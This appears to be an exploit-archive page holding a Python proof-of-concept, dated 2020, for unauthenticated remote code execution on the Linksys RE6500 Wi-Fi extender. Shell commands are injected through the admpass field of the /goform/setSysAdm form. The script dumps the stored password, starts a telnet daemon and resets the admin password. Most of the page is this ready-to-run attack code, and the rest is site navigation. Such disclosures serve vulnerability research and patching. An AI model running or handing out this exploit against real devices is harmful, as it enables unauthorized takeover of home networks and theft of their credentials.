Linksys RE6500 1.0.11.001 Remote Code Execution

Linksys RE6500 1.0.11.001 Remote Code Execution: Posted Dec 17, 2020; Authored by RE-Solver; Linksys RE6500 version 1.0.11.001 unauthenticated remote code execution exploit.; tags | exploit, remote, code execution; SHA-256 | 9efc9ac468518ee2905498668bcc7c0449034c86f3cda495c0476099603232f6; Download | Favorite | View

Linksys RE6500 1.0.11.001 Remote Code Execution

# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version:  FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 

#!/usr/bin/env python

from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
ip="192.168.1.226"

command="nvram_get Password >/tmp/lastpwd"
#save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})

r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prev password saved in /tmp/lastpwd")

command="busybox telnetd"
#start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})

r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Telnet Enabled")

#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prevent corrupting nvram - set a new password= admin")

Top Authors In Last 30 Days

Red Hat 234 files
indoushka 93 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,099)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,756)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,521)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,747)
UNIX (9,436)
UnixWare (187)
Windows (6,674)
Other

Linksys RE6500 1.0.11.001 Remote Code Execution

Linksys RE6500 1.0.11.001 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linksys RE6500 1.0.11.001 Remote Code Execution

Share This

Linksys RE6500 1.0.11.001 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems